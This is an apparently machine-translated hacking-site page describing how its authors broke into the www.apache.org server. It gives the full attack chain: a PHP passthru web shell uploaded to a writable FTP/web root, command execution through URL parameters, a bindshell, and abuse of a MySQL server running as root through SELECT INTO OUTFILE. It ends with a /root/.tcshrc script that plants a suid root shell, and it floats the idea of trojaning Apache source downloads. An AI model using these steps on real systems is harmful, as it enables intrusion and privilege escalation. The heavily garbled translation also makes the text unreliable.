How do we break through www.apache.org |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  How  | do hackerfile>> invasionanalysis >> we break through 
                  www.apache.org  Printing

            How do we break through www.apache.org
            Www.cshu.net  2002-8-18  fog rain village 

              How do we break through www.apache.org 
              By {} and Hardbeat
              Translates: Quack
              First, writes in front
              This article certainly was not had discovered any newest loophole, 
              it only was had pointed out an ordinary disposition was wrong -- 
              even links apache.org
              The staff also can dispose the mistake: ) Therefore this only is a 
              warning: Patches your system, can prevent the malicious attack.
              Second, introduction
              How did here describe us successfully to obtain in a week moved 
              the www.apache.org machine root jurisdiction
              And pattern (feather hairy drawing) altered to its host page on 
              Powered by the Apache Powered by 
              The Microsoft BackOffice pattern, has not done other any modifies 
              -- except has helped them to expel other
              (Possibly is evil intention) intruder.
              Here describes the loophole is not even the apache correlation, 
              they merely dispose the fault, one of them is BugZilla
              ... ... But its development to disposed the method in the README 
              document to make the exhaustive description, therefore all
              Could be the user responsibility, the apache user did not need to 
              worry for this: ).
              We carried on the attempt to www.apache.org the reason to have on 
              too many servers to run all are Arab League patch, if
              Its main engine is unsafe, then the intruder on possibly lays 
              aside the back door in its source code, this can endanger permits 
              multipurpose
              Household benefit.
              Certainly we are not willing to see this kind of matter occurs, 
              therefore we helped apache to make up the loophole certainly to 
              obtain ROOT
              After jurisdiction we are unable to control oneself change the 
              main page the desire: ) Plays a small joke.
              Below is the entire invasion process:
              1st, ftproot == wwwroot
              O+w dirs
              In seeks apache httpserver to want to examine whether the new 
              edition does have the cushion overflow in the process we to 
              connect on
              Ftp:/ftp.apache.org and http://www.apache.org was the identical 
              table of contents and has to be possible to write
              Table of contents existence!
              Thereupon we wrote young script wuh.php3 to contain the under 
              sentence: 
              <?
              Passthru ();
              ? >
              Passed to in the table of contents it on which that may write.
              2nd, Our commands executed
              Therefore, very convenient, id this order may by the under 
              sentence transfer:
              Http://www.apache.org/thatdir/wuh.php3? Cmd=id
              But after on passes on some bindshell again the procedure and uses 
              similar
              Http://www.apache.org/thatdir/wuh.php3? Cmd=gcc+-o+httpd+httpd.c
              The sentence translates it, then execution... ...
              Http://www.apache.org/thatdir/wuh.php3? Cmd=. /httpd

              3rd, The shell
              We use the bindshell procedure has the password to confirm: ) 
              Relative security some.
              Now we were allowed defined telnet the port which to port 65,533 
              us to tie up deciding place, like this we obtained this
              The nobody jurisdiction enters the power because cgi is by the 
              nobody status movement. 

              4th, The apache.org box
              We have discovered in the apache.org machine:
              -o=rx /root 
              -o=rx homedirs

              The apache.org movement is the freebsd3.4 platform, we do not want 
              merely or at sixes and sevens through the buffer overflow
              Exploit obtains root, lets us try merely the loophole which 
              disposes through they to obtain the highest jurisdiction!

              5th, Mysql
              After the long time search, we discovered mysql is by the root 
              jurisdiction movement, and may local move,
              Because apache.org also moved bugzilla to need the mysql account 
              number, and saved its user/password definite orders
              Puts, therefore very easily may obtain the mysql database the 
              account number password.
              We downloaded nportredird (from name to be allowed to know should 
              be carries likes salty food directional tool), and established
              Allows my IP to turn on and the heavy direction detection from 
              23,306 ports to be able to use me like this to local 3,306 ports 
              me
              Mysql customer end.
              6th, completely controls mysql, establishes the document with it
              Enters after 3,306 ports, enters BugZilla with the bugs account 
              number to tacitly approve one of security problems which the 
              installment brings... ...
              Including moves mysqld by the root status... ... .
              With 'SELECT... INTO OUTFILE;' Mho pepper &#462;  we may in any place 
              by the root status establishment document, this
              A document will be 666 jurisdiction, is unable to cover other 
              documents, but it still was useful, how do you prepare to use it? 
              Does not have
              The law may read with rhosts any person rhosts, rshd is does not 
              permit the connection movement, therefore rsh is unable to use.
              7th, increases /root/ tcshrc
              Thereupon we decide for him under a wrap: ) Thereupon we establish 
              document /root/ in the root folder tcshrc
              #! /bin/sh
              Cp /bin/sh /tmp/ rootsh
              Chmod 4,755 /tmp/ rootsh
              Rm -f /root/ tcshrc

              8th, ROOT! !
              Such is simple, now we may wait for some person moved su, very 
              lucky we have not waited too for a long time,
              Obtained suid shell, after becomes root the matter also is 
              similarly not worthy of mentioning changes the main page
              And transmitted Email for the main engine manager to inform the 
              existence loophole.
              9th, patches ftproot==wwwroot the loophole
              After enters another which the system we does establishes ftproot, 
              moves dist to ftproot/dist and ftproot
              Aims at this table of contents, might write the table of contents 
              will alter to the intruder to be unable the use, will maintain FTP 
              to serve invariablely... ...

              10th, what may we make?

              Also remembered last year occurred in the ftp.win.tue.nl matter? 
              Some people have put the wooden horse in tcp_wrappers: ) If
              We want such to do the speech, may put the wooden horse in the 
              Arab League patch in edition source program and lets everybody 
              download this
              Has the wooden horse back door the edition, stimulates very much, 
              not right: )
              11th, brief review:
              Discovered ftproot==webroot---> may write the table of contents 
              allows to pass on php3 script --->mysqld by the root movement, 
              moreover
              Lacks the password protection... ... This was the disposition is 
              wrong in. 
              Good... ... All smooth: )
              ---------------------------------------------------



              Original author: Hardbeat 
              Origin: Zhonglian green pledge 
              Altogether has 71 readers to read this article 

              [Tells friend] 
            Previous article:How carries on the attack to in the PHP procedure 
            common loophole (next) 

            Next article:Overflow procedure compilation skill 

            - this week popular article - related article 
            Establishes foreign WWW and the file server with the Apache reverse 
            proxy
            How do we break through www.apache.org



      CSHU 
